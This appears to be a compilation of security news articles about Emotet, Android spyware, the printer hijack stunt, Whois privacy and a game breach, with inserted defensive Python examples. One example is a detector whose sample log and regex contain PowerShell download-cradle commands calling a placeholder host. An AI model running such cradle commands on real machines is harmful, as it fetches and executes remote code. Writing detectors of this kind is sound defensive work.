STE WILLIAMS

Android Malware Hits Victims in 196 Countries

Malware disguised as games and utilities struck more than 100,000 victims before being taken out of Google Play.

New Android malware hit more than 100,000 users in 196 countries before Google removed it from Google Play — and it continues to steal personal information from users across the globe.

Researchers at Trend Micro found ANDROIDOS_MOBSTSPY, spyware that disguised itself as six different Android apps, five of which were removed from Google Play in February 2018. One of the apps, Flappy Birr Dog, remained available in the store until the beginning of 2019.

According to the researchers, the malware collects personal information, including user location and SMS conversations, and uses Firebase Cloud Messaging to send it to its command-and-control server. That same server can instruct the spyware to gather further data, including downloading files stored on the Android device, and to run a phishing campaign that displays fake Google and Facebook pop-ups to trick the victim into handing over credentials.

While the greatest number of victims were in India, which accounted for nearly one-third of the total, the malware’s reach extended to nearly every continent.

For more, read here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/vulnerabilities-and-threats/android-malware-hits-victims-in-196-countries/d/d-id/1333585?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Emotet Malware Gets More Aggressive

Emotet’s operators have been adding new capabilities, making the malware now even more dangerous to its enterprise targets.

Emotet, a nasty botnet and popular malware family, has proven increasingly dangerous over the past year as its operators adopt new tactics. Now armed with the ability to drop additional payloads and arriving via business email compromise (BEC), it’s become a major threat to organizations.

Security watchers are wary of Emotet, which was among the first botnets to spread banking Trojans laterally within target organizations, making removal difficult. Emotet first appeared in 2014 as a Trojan designed to snatch banking credentials and other sensitive data. The threat was frequently spread via phishing emails packed with malicious documents or links.

Over time, Emotet’s operators – a group called Mealybug – have evolved its business model and the shape of their attack from a banking Trojan to a means of delivering other groups’ threats. In 2018, Webroot dubbed Emotet the year’s worst botnet seen distributing banking Trojans.

“Its information stealing payloads are delivered at an impressive pace, suggesting threat actors have automated multiple steps in their campaign operations,” Webroot researchers write in a blog post on their rankings of 2018’s worst threats. The changes to Emotet, while gradual at first, quickly ramped up in recent years as attackers switched to even more nefarious tactics.

After a quiet period in 2015, Emotet detections spiked in the second half of 2017, Symantec reported. Mealybug’s victims expanded that year to include targets in Canada, China, Mexico, and the UK. Toward the end of 2017, the Cylance Threat Research Team analyzed a malicious Microsoft Word file with a malicious macro program created to download Emotet malware.

Taking on New Threats

In 2018, Mealybug ramped up its activity to the point where it was selling malware to other actors, says Sig Murphy, managing director of incident response and forensics at Cylance. Emotet was combined with Trickbot and Qakbot, a tactic Symantec also had detected in Feb. 2018. The blend of Emotet with other strains of ransomware made the threat more dangerous.

“The combination there is really hard to defend against properly because the loader is polymorphic,” says Murphy. “It changes every time it infects a computer.”

US-CERT issued an alert for Emotet in July 2018, calling it an advanced modular banking Trojan that mainly functions as a downloader or dropper of other banking Trojans. Emotet is “the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors,” it says, costing governments up to $1M per incident.

This hybrid threat model “is a unique challenge” to organizations, Murphy says, and catches many off guard. Emotet alone used to drop its own Emotet-branded malware. Later in the year, it was used to deliver new types of threats. Before, it would collect email credentials and use them to spread laterally. It later became interested in the content of targeted emails, he adds.

“It’s pretty clear they’re trying to pivot into [the] BEC attack model, which is different from what they’ve done in the past,” says Murphy of the Mealybug threat group’s evolving strategies. In August 2018, Trend Micro picked up on spoofed banking emails arriving with Emotet malware. For example, spam emails contained payment notifications sent from spoofed bank email addresses. The email body carries a link to download a .doc file whose macros, when run, launch a PowerShell command that downloads and executes the Emotet malware, the researchers explain.
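The macro-to-PowerShell chain just described is what a detection rule for this wave keys on: an Office application spawning a script host, and a command line carrying download-cradle or obfuscation markers. The following is an added example, not code from the article or from any of the vendors it quotes. It runs a simple scorer over constructed process-creation records; the pipe-separated record format, the indicator list and the host names are all assumptions made for this illustration.

```python
"""Added example (not from the article): flag the maldoc-to-PowerShell chain
described for the Emotet spam wave, using constructed process-creation records.

Record format (assumed, constructed for this example):
    timestamp|host|parent_image|image|command_line
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Office applications that should rarely spawn a scripting host directly
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script/command interpreters a macro would typically launch
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Markers of PowerShell download cradles and obfuscation (assumed indicator list)
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|"
    r"invoke-expression|\biex\b|-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden|"
    r"start-bitstransfer",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str   # base name of the parent image, lower-cased
    image: str    # base name of the new process image, lower-cased
    cmdline: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse one record; the command line (last field) may itself contain '|'."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        raise ValueError(f"malformed record: {line!r}")
    ts, host, parent, image, cmdline = parts
    return ProcEvent(ts, host, _basename(parent), _basename(image), cmdline)


def score_event(ev: ProcEvent):
    """Return (severity, reasons). 'high' needs both the suspicious parent/child
    pair and cradle markers; either one alone is 'medium'."""
    reasons = []
    if ev.parent in OFFICE_PARENTS and ev.image in SCRIPT_HOSTS:
        reasons.append(f"{ev.parent} spawned {ev.image}")
    hits = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(ev.cmdline)})
    if hits:
        reasons.append("command-line markers: " + ", ".join(hits))
    severity = {0: "none", 1: "medium", 2: "high"}[len(reasons)]
    return severity, reasons


def detect(lines: List[str]) -> List[Dict]:
    """Score raw records and keep only the events worth an alert."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        severity, reasons = score_event(ev)
        if severity != "none":
            alerts.append({"ts": ev.ts, "host": ev.host,
                           "severity": severity, "reasons": reasons})
    return alerts


# Constructed sample records: a macro-launched cradle, an admin script run from
# Explorer, a cradle launched from cmd.exe, and a benign Word child process.
SAMPLE_LOG = [
    "2019-01-03T09:12:01Z|ws-0411|C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE"
    "|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=",
    "2019-01-03T09:12:05Z|ws-0411|C:\\Windows\\explorer.exe"
    "|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1",
    "2019-01-03T09:13:10Z|ws-0522|C:\\Windows\\System32\\cmd.exe"
    "|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|powershell (New-Object Net.WebClient).DownloadString('http://example.invalid/x')",
    "2019-01-03T09:14:00Z|ws-0411|C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE"
    "|C:\\Windows\\splwow64.exe|splwow64.exe 12288",
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a["severity"].upper(), a["ts"], a["host"], "; ".join(a["reasons"]))
```

Only the first record hits both conditions and rates "high"; the cmd.exe-launched cradle is "medium" because the parent is not an Office application, and the inventory script and the print-spooler child produce nothing. Splitting the two conditions this way keeps a single heuristic from dominating: Word spawning a shell is rare enough to be worth a look even with an innocuous command line, and a cradle from any parent is worth a look on its own.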

After ramping up in early 2018, Murphy says Emotet increased again during the holiday season. Through the start of 2019, the malware continued to spread, and new enterprise clients were asking Cylance for help after getting infected, he says. Its growth signifies greater maturity among the Mealybug actors as they learn what’s effective.

“They seem much more organized than a lot of other groups,” Murphy explains. “The shift [to BEC] says they’re continuing to be more organized … they know what’s working and what’s not.” New ransomware variants like Qakbot provide a new source of income, he adds.

Thinking Ahead of the Attackers

It’s hard to tell what Mealybug will do next. One route they could take, says Murphy, is attempt to make their attacks quieter. While he has no indication they might do this, he points out how Emotet in its current form is “very noisy” in its spread. If they could change the threat so it spreads without taking down systems, it would be harder to know a business is at risk.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial …

Article source: https://www.darkreading.com/attacks-breaches/emotet-malware-gets-more-aggressive-/d/d-id/1333584?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Um, I’m not that Gary, American man tells Ryanair after being sent other Gary’s flight itinerary

Infamous no-frills Irish airline Ryanair has been accused by a tormented man from New Jersey in the US of bombarding him with flight itinerary emails intended for an actual passenger.

“A lot of people seem to think that my email address is theirs,” sighed Reg reader Gary, who told us how Ryanair’s online customer service chat agents refused to change the email address on the booking for which he was receiving messages.

Gary, a resident of New Jersey, in the northeastern United States, suffers from the eternal problem that afflicts new adopters: his Gmail address, a simple combination of name and surname, means that quite often he receives emails intended for other people.*

Normally, Gary said, “I reply to the person that’s got it wrong, they fix it. Or I reply to the company that has bad records, they fix it. Or I reply using a form and the company deals with it.”

Unfortunately, this was not what happened when Ryanair started sending him booking confirmation emails for a flight between Dublin, Ireland, and Eindhoven, in the Netherlands.

“I figured it was the same deal – somebody left out a middle initial, or somebody forgot their local Gmail isn’t dot-com, but rather dot-co-dot-TLD,” Gary said. “I went to Ryanair’s website, found that they don’t have a phone number in the States (not surprising), but they had a contact form. Filled it out in the beginning of October, form said I’d get a response in 7 days. Nothing.”

He tried Twitter, and after being directed to the company website, which informs Americans that they need to call an 0871 premium rate number from the USA, Gary tried the live website chat, with the following result:

Gary's chat with Norbert, extract

Customer service chap “Norbert” later added: “We send the itineraries to the email provided. If the passenger provided it incorrectly, that is not our fault, is it?”

While fat-fingered passengers can and do make typos, this doesn’t excuse Ryanair’s refusal to correct a clear mistake. However, “Norbert” went on to access the booking and told Gary, in messages seen by El Reg, that his own address “is not the email in this booking”.

Gary shot back: “Then I got some bad news for you: he didn’t provide the wrong email, your system is leaking.” Norbert admitted that Ryanair’s system “sends to the provided email, which is very similar, but not the same”.

We have asked Ryanair for comment and will update this article if the airline responds.

Gmail is well known for accepting differing spellings of a registered email address. The provider does not differentiate between addresses with or without dots in the part before the @ (a dotted and an undotted spelling of the same name deliver to the same mailbox), and crafty users can set up more advanced filtering and email tracking through the plus operator, as a Wikihow post details.

It is possible that someone has misunderstood either the dots or the plusses and accidentally signed up in a way that points to Gary instead of the rightful recipient. ®
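The dots-and-plus behaviour above is easy to get wrong in a booking or sign-up system, which is exactly how an itinerary ends up with the "wrong" Gary. The following is an added example, not code from the article or from Ryanair or Google: it canonicalises an address the way Gmail routes it (dots ignored, "+tag" dropped, case folded, googlemail.com treated as gmail.com; that domain alias is an assumption of this example) so that two spellings can be recognised as one mailbox, and it reports which rule makes them collide. A system that stores the canonical form next to the submitted one can spot that a new booking's address reaches a mailbox already owned by someone else and ask for confirmation before sending anything.

```python
"""Added example (not from the article): canonicalise Gmail addresses so that a
dotted, plus-tagged or googlemail.com spelling is recognised as the same
mailbox, and explain which Gmail rule makes two spellings collide."""
from typing import List, Optional, Tuple

# Assumption of this example: Google delivers both domains to the same mailbox.
GMAIL_DOMAINS = {"gmail.com", "googlemail.com"}


def _split(addr: str) -> Tuple[str, str]:
    addr = addr.strip()
    local, sep, domain = addr.rpartition("@")
    if not sep or not local or not domain:
        raise ValueError(f"not an email address: {addr!r}")
    return local, domain.lower()


def canonical(addr: str) -> str:
    """Mailbox-level identity of an address.

    Gmail: case-insensitive local part, dots ignored, '+tag' suffix dropped,
    googlemail.com folded into gmail.com. Other domains: only the domain is
    lower-cased, because the local part's rules belong to that provider."""
    local, domain = _split(addr)
    if domain in GMAIL_DOMAINS:
        local = local.lower().split("+", 1)[0].replace(".", "")
        domain = "gmail.com"
    return f"{local}@{domain}"


def same_mailbox(a: str, b: str) -> bool:
    return canonical(a) == canonical(b)


def collision_reasons(a: str, b: str) -> Optional[List[str]]:
    """Why two spellings reach one mailbox; None if they do not."""
    if not same_mailbox(a, b):
        return None
    if a.strip() == b.strip():
        return ["identical"]
    (la, da), (lb, db) = _split(a), _split(b)
    la, lb = la.lower(), lb.lower()
    reasons = []
    if da != db:
        reasons.append("domain alias")          # gmail.com vs googlemail.com
    base_a, _, tag_a = la.partition("+")
    base_b, _, tag_b = lb.partition("+")
    if tag_a != tag_b:
        reasons.append("plus tag")              # one side carries a +tag
    if base_a != base_b:
        reasons.append("dots")                  # same letters, different dots
    return reasons or ["case"]                  # only letter case differed


if __name__ == "__main__":
    # Constructed sample: the spelling on a booking versus the mailbox owner.
    booked, owner = "gary.smith+flights@googlemail.com", "GarySmith@gmail.com"
    print(canonical(booked), canonical(owner), collision_reasons(booked, owner))
```

Note what the function deliberately does not do: for domains other than Gmail it leaves the local part alone, so "g.ary@example.com" and "gary@example.com" are reported as different mailboxes, which is the safe default when you do not know the receiving provider's rules.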

Bootnotes

* See also Twitter user @johnlewis, who regularly receives praise, blame, complaints and more, all intended for the British department store and not for a random American chap. To John’s eternal credit, his good humour in the face of this irrelevant daily barrage is never knowingly undersold.

** Gary is no stranger to these mixups. As he told us:

Hi Wanita,

Wrong person. Bunch of Gary [surname deleted to save him from spam] around the world (at least two in England, maybe three in Ireland, two or more in Oz, and one electrical contractor in Wilkes-Barre, Pennsylvania, US) think my email is their email. There’s also a sort-of famous Gary [blank] in California, but he’s cool. We had lunch together once.

I have not ordered any lintels from you. Truth be told, I’m not 100% sure what lintels are. I mean, I visited Australia once but what with the bridge-climbing, wine-touring, wombat-petting, and Great Barrier Reef snorkeling, lintels didn’t come up at all. I’m sure your lintels are very nice, though.

For the record, I also do not have a Peugeot that needs service in the Lakes District, have an order for a Brexit-supporting cloisonne badge to be delivered to the Scottish Borderlands, owe registration fees on a vehicle in Dublin, have a Jurassic Park Smash ‘n’ Throw T-Rex on order at a toy shop in Kildare, have plans to fly between Ireland and Eindhoven, hold a Lawson’s card in Melbourne, or hold any interest in various contracts and requests-for-bid for electrical jobs. Oh and I don’t have a warranty on tires in California, but that wasn’t the Gary [blank] that I know, so at least one more?

Please contact your guy and update your records. Tell him Gary said hi.

Gary
The one in New Jersey

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/01/03/ryanair_email_misdirection/

Pewdiepie fanboi printer, Chromecast haxxx0r retreats, says they’re ‘afraid of being caught’

The prankster who hijacked printers and smart TV gizmos to promote YouTube star Pewdiepie has shut down their website, citing “the constant pressure of being afraid of being caught and prosecuted.” No sh*t, Sherlock.

While “TheHackerGiraffe” claimed that their antics were an attempt at drawing attention to crap UPnP port security practices by the owners of networked printers, smart TVs and, latterly, Chromecasts, in reality it was a publicity drive for the most-subscribed-to YouTube channel – and also included fundraising efforts, though his co-hacker later denied it was all about the YouTube spat.


Essentially, the miscreants scanned the internet for unsecured printers, Chromecasts, and other devices facing the public internet via UPnP services on people’s home routers, and then commandeered the gadgets to display messages warning of the security holes and to subscribe to a YouTube channel popular with da youth.

Just disable UPnP in your router. Anyway, back to the cyber-giraffe…

“So, here we are. At the endgame. I’m sorry for leaving so suddenly, and I’m sorry for all of you who expected more tutorials, guides, or anything. I can’t do this. It may not look like it, but the constant pressure of being afraid of being caught and prosecuted has been keeping me up and giving me all kinds of fears and panic attacks,” posted a person claiming to be TheHackerGiraffe on dump-plain-text-online site Pastebin earlier today.

They added: “I just wanted to inform people of their vulnerable devices while supporting a YouTuber I liked. I never meant any hard [SIC], nor did I ever have any ill intentions. I’m sorry if anything I’ve done has made you feel under attack or threatened.”

A Twitter user also screenshot what appeared to be a tweet from TheHackerGiraffe, which read: “Someone just had to play the legal card.”

The whole thing started because Felix “Pewdiepie” Kjellberg wanted to keep his status as operator of YouTube’s most popular channel. With 79.5 million registered accounts on the site following his output, his nearest rival is an Indian channel called T-series, which posts Bollywood videos to 78.6 million subscribers.

It’s harmless enough stuff that people in the real world can happily exist without. At least, that was the situation until TheHackerGiraffe and co-conspirator j3ws3r decided to weigh in. The duo set up a website (since deleted) and with what they previously claimed was a $5 Google cloud subscription, they set to work remotely printing out exhortations to subscribe to the Pewdiepie YouTube channel on any internet-connected printer they could access.

They hit thousands of printers around the world by pulling a list of devices visible over port 9100 from “what vulnerable stuff can I muck about with?” search engine Shodan and plugging that into open-source printer hacking utility PRET, which was shown off at Black Hat a couple of years ago.

TheHackerGiraffe’s fundraising Patreon page and Twitter account have both been deleted. J3ws3r has woken up to find the whole world pointing and laughing at him for his attempt to deliver more followers to his favourite YouTuber, and he isn’t best pleased about that. Yesterday he tweeted this…

… only to begin tweeting again, after an 8-hour break at the time of writing, with this:

Ken Munro, of infosec outfit Pen Test Partners, told The Register that what HackerGiraffe and j3ws3r were up to may have broken the law, at least in the UK.

“It’s an interesting story and a bit of a shame that it ended this way. @hackergiraffe acknowledged earlier on twitter that what they were doing wasn’t ethical, though clearly felt that the public interest was better served through PewDiePie!” said Munro, over email, who continued: “In hindsight, they’ve realised that it overstepped the mark. As I understand it, the Computer Misuse Act doesn’t take account of intent.”

He added that their eyeball-grabbing stunt “may not have had the same impact in the media, nor the same positive result of Google committing to address the issue,” concluding: “The law is the law… The Computer Misuse Act isn’t perfect and it can obstruct legitimate security research. It is long overdue a revision, but until that occurs all researchers should ensure they stay the right side of it, however well intended they are.”

What are the lessons here? Number 1, don’t muck around with stuff you’ve not got permission to access. Number 2, don’t start trying to raise money if you want to stay anonymous (even Patreon carries out ID checks before sending cash). Number 3, drop the hubris. This wasn’t so much sailing too close to the Sun as doing a roly-poly into an active volcanic crater. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/01/03/pewdiepie_printer_hacker_deletes_accounts/

Redefining Critical Infrastructure for the Age of Disinformation

In an era of tighter privacy laws, it’s important to create an online environment that uses threat intelligence productively to defeat disinformation campaigns and bolster democracy.

When we think of critical infrastructure in the cyber context, we tend to think about industrial control systems for power plants and water treatment facilities, or the electronic ballot box. But in today’s environment, when disinformation is a major threat vector to our national security, it’s important to expand these preconceptions.

Let’s start with the basic tenet that an informed citizenry is foundational to the integrity of a democratic system. In that context, certain sources of information — especially those outside of entertainment or commerce — can also be considered critical. The concept of a newspaper of record, which was established long ago, is a good example, along with its modern equivalents such as radio, television, and Internet media. These institutions play an important role in shaping public opinion and policy decisions.

Although news sources have always carried some degree of editorial bias, the bias in journals of record is based on an assumption that, whatever the bias, the foundation of the reported information is personal observation and recorded fact. Now that “alternative facts” have become mainstream, understanding sources of (mis)information and combating overt information warfare operations demands the rigor of critical infrastructure protection.

The Unintended Consequences of Privacy Regulations
We are also seeing the potentially detrimental effects of well-meaning privacy legislation, which has been enacted at a particularly inopportune time given the rise in fake news and election meddling. The European Union’s General Data Protection Regulation (GDPR), the California Consumer Privacy Act of 2018, and the Canadian Personal Information Protection and Electronic Documents Act are all positive steps forward in protecting citizens. But, as is so often the case, these well-intentioned efforts have unintended consequences.

While there is no doubt that privacy regulation aims to safeguard citizens’ private data, these new laws are also hampering cybersecurity efforts — specifically, in the context of security analysts’ ability to gather and share threat intelligence about suspicious or malicious online infrastructure. As a particularly concerning example, privacy rules have taken a large bite out of the data available through the domain Whois services, making domain ownership largely opaque to investigators. This is significant, because analysis of infrastructure through a combination of DNS and registration data has been a mainstay of threat intelligence operations for years.

It’s true that threat actors have used Whois privacy for years to cover their tracks. But they have also routinely used bogus registration information to cover their tracks. Sooner or later, many of them slip up, and those mistakes help investigators and analysts crack open emerging or ongoing attack campaigns. That’s why it is critical that security researchers have access to registration and infrastructure information that can identify the actors behind cyber incidents of all kinds — including fake news campaigns and outright election tampering. Threat research from FireEye on Iranian operations further emphasizes the importance of this kind of threat intel.

This One Weird Trick to Save Democracy
OK, “save democracy” is perhaps a bit of hyperbole, but the underlying point is valid: Using threat intelligence productively in the effort to defeat disinformation campaigns is important for creating an online environment that bolsters democracy in an age of tighter privacy laws. While the removal of identifying information from domain Whois records has put a crimp in adversary infrastructure analysis workflows, it is by no means a showstopper. With the current privacy limitations on how data can be used and shared, cybersecurity professionals simply will need to understand how their efforts to combat threat actors are affected.

The good news is that analysts and hunters still can very effectively identify and combat cyber threats. But it will require going beyond Whois with shifts in long-ingrained workflows and practices used in adversary analysis. For example:

  • Registration details certainly have been some of the lowest-hanging fruit for developing an actor persona or mapping a campaign. But there is a wealth of other data that can often be just as effective. Examples include DNS records (including Start of Authority, or SOA, records, which carry a responsible-party email address), as well as web content such as SSL/TLS certificates, tracking codes, website titles, and screenshots. When actors create the infrastructure for an attack campaign, they often reuse many of these elements across multiple domains. It would be costly in terms of time and, in some cases, money for them to do otherwise. This is to your advantage when correlating threat actor assets.
  • Remember that doxing isn’t your goal (unless you’re in law enforcement, perhaps). When trying to understand an emerging or evolving attack campaign, the most valuable aspect of attribution is to identify a persona (like a “John Doe” profile in physical crime investigations) that ties together the domains, IP addresses, web assets, malware files, and other components of the campaign. You don’t need an actual, genuine identity. Even in the days of open Whois records, it was very hard to be certain that a given identity was legitimate.
  • Once a persona or correlated set of attack infrastructure has been identified, it becomes easier to take concrete actions such as searching for the discovered items (domains, IPs, URLs, etc.) in log archives or SIEMs, creating blocking rules to cover the entire campaign, or creating watchlists to monitor for ongoing evolution or expansion of the attack infrastructure.
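The three points above describe one workflow: pick the non-Whois attributes to pivot on, expand from a seed domain into a persona, then turn the result into blocklist and watchlist material. The following is an added example, not code from the article or from DomainTools. It implements that expansion over constructed records (the .test domains, RFC 5737 addresses, SOA contacts, certificate fingerprints and tracking IDs are all placeholders) and shows the one caveat that matters most in practice: an attribute value shared by too many domains, such as a shared-hosting IP or a big DNS provider's SOA contact, is not a pivot and must be discarded or the cluster swallows unrelated sites.

```python
"""Added example (not from the article): pivot from one known-bad domain to the
rest of a campaign's infrastructure using SOA contact, TLS certificate
fingerprint, tracking ID, page title and IP, while ignoring values shared by
too many domains. All records are constructed placeholders."""
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

PIVOT_FIELDS = ("soa_rname", "tls_fingerprint", "tracking_id", "title", "ip")
Key = Tuple[str, str]   # (field, normalised value)

# Constructed sample records. The first three are the campaign; the others are
# unrelated sites that happen to share a hosting IP and a DNS provider.
RECORDS: List[Dict[str, Optional[str]]] = [
    {"domain": "login-verify-example.test", "soa_rname": "admin@rnail-relay.test",
     "tls_fingerprint": "aa11", "tracking_id": "UA-00000-1",
     "title": "Account verification", "ip": "198.51.100.10"},
    {"domain": "secure-update-example.test", "soa_rname": "dns@cheap-ns.test",
     "tls_fingerprint": "bb22", "tracking_id": "UA-00000-1",
     "title": "Account verification", "ip": "198.51.100.11"},
    {"domain": "news-brief-example.test", "soa_rname": "admin@rnail-relay.test",
     "tls_fingerprint": "bb22", "tracking_id": "UA-00000-2",
     "title": "Breaking news", "ip": "203.0.113.5"},
    {"domain": "benign-shop.test", "soa_rname": "hostmaster@bigdns.test",
     "tls_fingerprint": "cc33", "tracking_id": "UA-11111-1",
     "title": "Shop", "ip": "203.0.113.5"},
    {"domain": "benign-blog.test", "soa_rname": "hostmaster@bigdns.test",
     "tls_fingerprint": "dd44", "tracking_id": None,
     "title": "Blog", "ip": "203.0.113.5"},
    {"domain": "benign-club.test", "soa_rname": "hostmaster@bigdns.test",
     "tls_fingerprint": "ee55", "tracking_id": "UA-22222-1",
     "title": "Club", "ip": "203.0.113.5"},
]


def _value(record: Dict[str, Optional[str]], field: str) -> str:
    return (record.get(field) or "").strip().lower()


def build_index(records, max_share: int):
    """Map each (field, value) to the domains carrying it, and split off the
    values shared by more than max_share domains as too noisy to pivot on."""
    idx: Dict[Key, Set[str]] = defaultdict(set)
    for r in records:
        for f in PIVOT_FIELDS:
            v = _value(r, f)
            if v:
                idx[(f, v)].add(r["domain"])
    usable = {k: d for k, d in idx.items() if len(d) <= max_share}
    noisy = sorted(k for k, d in idx.items() if len(d) > max_share)
    return usable, noisy


def expand_persona(seed: str, records, max_share: int = 2):
    """Breadth-first expansion from the seed across usable shared attributes.
    Returns (sorted cluster, pivot trail, noisy values that were ignored)."""
    by_domain = {r["domain"]: r for r in records}
    usable, noisy = build_index(records, max_share)
    cluster, frontier, pivots = {seed}, [seed], []
    while frontier:
        d = frontier.pop()
        for f in PIVOT_FIELDS:
            key = (f, _value(by_domain[d], f))
            for other in sorted(usable.get(key, ())):
                if other not in cluster:
                    cluster.add(other)
                    frontier.append(other)
                    pivots.append((d, f, key[1], other))   # how we got there
    return sorted(cluster), pivots, noisy


def watchlist(cluster: List[str], records, max_share: int = 2) -> List[Key]:
    """Attribute values to monitor for new domains joining the campaign."""
    usable, _ = build_index(records, max_share)
    members = set(cluster)
    return sorted(k for k, d in usable.items() if d & members)


if __name__ == "__main__":
    cluster, pivots, noisy = expand_persona("login-verify-example.test", RECORDS)
    print("blocklist:", cluster)
    for src, field, value, dst in pivots:
        print(f"  {src} --[{field}={value}]--> {dst}")
    print("ignored as too common:", noisy)
    print("watchlist:", watchlist(cluster, RECORDS))
```

With max_share=2 the seed reaches the other two campaign domains through the shared SOA contact, tracking ID, page title and certificate, and the three benign sites stay out because the only things linking them are the hosting IP and the DNS provider's SOA contact, both flagged as noisy. Raising max_share to 10 pulls all six domains into one cluster, which is the failure mode to watch for when tuning that threshold against real data.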

What’s Next
The last two major US elections turned a sharp spotlight on the security (or lack of security) of the mechanisms that allow democracy to operate. Long after the votes have been counted, forensic analysis will seek to understand what, if any, impact was made by adversarial online activity, while intelligence analysis will similarly examine whether disinformation campaigns were effective in influencing electoral outcomes. The ability to comprehensively, accurately, and efficiently analyze threat actor infrastructure and campaigns is a core requirement of such work.

The good news is that there are excellent data sources, tools, and practices to enable security and intelligence professionals to shed light on, and ultimately protect against, adversaries who seek to hide in the Internet’s shadows.


Tim Helming, DomainTools Director of Product Management, has over 15 years of experience in cybersecurity, from network to cloud to application attacks and defenses. At DomainTools, he applies this background to helping define and evangelize the company’s growing portfolio of …

Article source: https://www.darkreading.com/threat-intelligence/redefining-critical-infrastructure-for-the-age-of-disinformation-/a/d-id/1333568?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Town of Salem Game Breached, 7.6M Players Affected

BlankMediaGames disclosed a data breach that affects millions using the browser-based role-playing game.

A data breach at BlankMediaGames (BMG) has affected more than 7.6 million players of Town of Salem, a browser-based role-playing game.

The incident was disclosed on December 28 to cybersecurity company DeHashed, which received an anonymous email containing evidence of server access and the database. DeHashed says affected data includes usernames, emails, passwords, IP addresses, game and forum activity, and payment information. Some users who paid for features had billing data compromised.

However, in an announcement about the breach on the Town of Salem forum, a representative by the name of Achilles reported that the game does not store any credit card or payment data. Further, the representative wrote, all passwords were hashed and not stored in plain text. Third-party payment processors are responsible for financial transactions; Town of Salem does not have access.

“The only important data compromised would be your Username/hashed password, IP and email,” Achilles wrote. “Everything else is just game related data.”

Read more details here.


Article source: https://www.darkreading.com/attacks-breaches/town-of-salem-game-breached-76m-players-affected/d/d-id/1333580?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Taming the Digital Wild West

Congress must do more to encourage good Samaritan efforts in the cybersecurity community and make it easier for law enforcement to consistently collaborate with them.

Fred Wolens, VP of Policy and Communications at Recorded Future, also contributed to this article.

The Internet is the digital Wild West, more so now than ever before.

The past two years specifically have been a vortex of accelerating malice and resulting chaos: attempted Olympic disruption, American election interference, global ransomware worms, central bank heists, credit bureau pillaging, global business losses, cryptocurrency exchange thefts. And these are only the highlights of what has been publicly reported.

Despite the increasingly dire headlines, there’s hope yet for the Internet. It begins with an improved public/private model — backed by legislation — for policing cybercrime and helping American businesses defend themselves.

Step 1: One Focused Agency
For American individuals and businesses, there is no clear answer on who leads the fight on cybercrime — or who leads interagency collaboration. In federal law enforcement, there are numerous agencies within the Departments of Justice and Homeland Security that investigate cybercrime, among them: the FBI, Secret Service, Homeland Security Investigations (HSI), and Office of the Inspector General (OSI). In addition, you can also add state and local police agencies to the web of confusion — and that’s still before considering the overlap with intelligence (ODNI/NSA), military (DIA or NCIS), and international (Interpol/Europol) agencies.

Certainly, there has been progress toward industry partnership in the past decade. Both the Secret Service and FBI have created cybersecurity-focused entities (the Electronic Crimes Task Forces [ECTF] and InfraGard, respectively). However, the limitations on law enforcement information sharing make these groups less effective, blunting their ability to further affect cybercrime.

Equally responsible for the marginal success in prior efforts is the lack of NSA participation. It is clear that the NSA has the most visibility into malicious cyber activity and is the most informed organization in America (and probably the planet) on adversary cyber activity.

We need an organization within the NSA — modeled on the UK’s National Cyber Security Centre (NCSC), which is part of Government Communications Headquarters (GCHQ, the British NSA equivalent) — that is focused solely on helping American individuals and businesses defend themselves. The NCSC provides timely guidance on threats, ranging from phishing to malware to fraud, and shares technology with the private sector directly. Similarly, America needs a well-informed cybersecurity guidance resource to fill the current void.

History has shown that businesses are ill equipped for sustained defense from well-funded and motivated attackers. Sophisticated enemies, with seemingly endless time, are using the cyber domain to continuously victimize American businesses at will. The cost of doing business should not include fending off nation-state-sponsored offensive cyber campaigns.

The answer begins with Congress legislating a new organization, modeled after the NCSC, owned by the NSA, and mandated to share all possible threat guidance and defensive technology with American businesses. The goal: to increase America’s cybersecurity awareness and resilience.

Step 2: Retain and Invest in Government Talent
We need America’s best and brightest in public service defending America from cyber enemies. Employee compensation and training budgets must increase across the board.

The problem is that government salaries and the General Services Administration (GSA) schedule have not kept pace with private sector salaries for employees with cybersecurity skills. This is equally true across military, intelligence, and law enforcement agencies.

Government employees increase their skills, learn tradecraft, and then depart for the private sector because the opportunity costs are too great for them and their families to stay in government service. Ultimately, a government retirement plan can’t compete with a 30% (or more) private sector salary increase.

